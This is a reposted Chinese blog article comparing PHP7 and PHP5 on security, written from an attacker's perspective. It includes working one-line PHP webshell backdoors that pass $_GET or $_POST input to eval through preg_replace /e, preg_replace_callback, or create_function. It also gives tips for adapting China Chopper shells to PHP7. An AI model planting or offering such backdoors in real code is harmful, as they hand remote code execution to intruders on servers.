加入收藏 | 设为首页 | 会员中心 | 我要投稿 应用网_丽江站长网 (http://www.0888zz.com/)- 科技、建站、数据工具、云上网络、机器学习!
当前位置: 首页 > 运营中心 > 建站资源 > 策划 > 正文

PHP7和PHP5在安全上的区别

发布时间:2019-03-14 14:41:14 所属栏目:策划 来源:温酒
导读:副标题#e# 前言 之前测试的时候发现很多菜刀的马都不能用了,大马也几乎3/4不能正常在php7运行。网上百度也没有找到太多相关性的文章,就自己总结测试了一下关于安全性上的区别。 函数修改 1. preg_replace()不再支持/e修饰符 ?php preg_replace(/.*/e,$_GE
副标题[/!--empirenews.page--]

前言

之前测试的时候发现很多菜刀的马都不能用了,大马也几乎3/4不能正常在php7运行。网上百度也没有找到太多相关性的文章,就自己总结测试了一下关于安全性上的区别。

函数修改

1. preg_replace()不再支持/e修饰符 

  1. <?php 
  2. preg_replace("/.*/e",$_GET["h"],".");  
  3. ?> 

利用e修饰符执行代码的后门大家也用了不少了,具体看官方的这段描述:

很不幸,在PHP7以上版本不在支持e修饰符,,同时官方给了我们一个新的函数preg_replace_callback:

这里我们稍微改动一下就可以利用它当我们的后门:

  1. <?php 
  2. preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); 
  3. ?> 

PHP7和PHP5在安全上的区别

2. create_function()被废弃 

  1. <?php 
  2. $func =create_function('',$_POST['cmd']);$func(); 
  3. ?> 

少了一种可以利用当后门的函数,实际上它是通过执行eval实现的。可有可无。

3. mysql_*系列全员移除

如果你要在PHP7上面用老版本的mysql_*系列函数需要你自己去额外装了,官方不在自带,现在官方推荐的是mysqli或者pdo_mysql。这是否预示着未来SQL注入漏洞在PHP上的大幅减少呢~

去特么的预示,我已经很久没在目标站上挖到过sql注入了,全都是预编译!

4. unserialize()增加一个可选白名单参数

  1. $data = unserialize($serializedObj1 , ["allowed_classes" => true]); 
  2. $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);  

其实就是一个白名单,如果反序列数据里面的类名不在这个白名单内,就会报错。

像这样的报错!

可以是类名也可以是布尔数据,如果是FALSE就会将所有的对象都转换为__PHP_Incomplete_Class对象。TRUE是无限制。也可以传入类名实现白名单。

妈的,还好现在是可选不是必选,要是默认FALSE逼程序员弄白名单那就真的吐血了。

5. assert()默认不在可以执行代码

这就是众多马不能用的罪魁祸首了,太多的马用assert()来执行代码了,这个更新基本就团灭,一般情况下修改成eval即可正常运行了~

提一下,菜刀在实现文件管理器的时候用的恰好也是assert函数,这导致菜刀没办法在PHP7上正常运行。

语法修改

1. foreach不再改变内部数组指针 

  1. <?php 
  2. $a = array('1','2','3'); 
  3. foreach ($a as $k=>&$n){ 
  4.     echo ""; 
  6. print_r($a); 
  7. foreach ($a as $k=>$n){ 
  8.     echo ""; 
  9.  
  11. print_r($a); 

这样的代码在php5中,是这样的执行结果:

因为数组最后一个元素的 $value 引用在 foreach 循环之后仍会保留,在第二个循环的时候实际上是对之前的指针不断的赋值。php7中通过值遍历时,操作的值为数组的副本,不在对后续操作进行影响。

这个改动影响了某些cms的洞在PHP7上无法利用了….你知道我指的是哪个洞的。

这个问题在PHP7.0.0以后的版本又被改回去了,只影响这一个版本。

2. 8进制字符容错率降低

在php5版本,如果一个八进制字符如果含有无效数字,该无效数字将被静默删节。 

  1. <?php 
  2. echo octdec( '012999999999999' ) . "n"; 
  3. echo octdec( '012' ) . "n"; 
  4. if (octdec( '012999999999999' )==octdec( '012' )){ 
  5.         echo ": )". "n"; 

比如这样的代码在php5中的执行结果如下:

但是在php7里面会触发一个解析错误。

这个问题同样在PHP7.0.0以后的版本又被改回去了,只影响这一个版本。

3. 十六进制字符串不再被认为是数字

这个修改一出,以后CTF套路会少很多啊~

很多骚操作都不能用了~

这个没什么好说的,大家都懂。 

  1. <?php 
  2. var_dump("0x123" == "291"); 
  3. var_dump(is_numeric("0x123")); 
  4. var_dump("0xe" + "0x1"); 
  5. var_dump(substr("foo", "0x1")); 
  6. ?> 

(编辑:应用网_丽江站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
相关内容
    推荐文章
      站长推荐
      热点阅读

        【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

        建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的优质浏览效果

        Copygight © 2013-2023 http://www.0888zz.com/ All Rights Reserved. 应用网_丽江站长网

        ICP备案:浙ICP备12044117号 浙公网安备 33038102330468号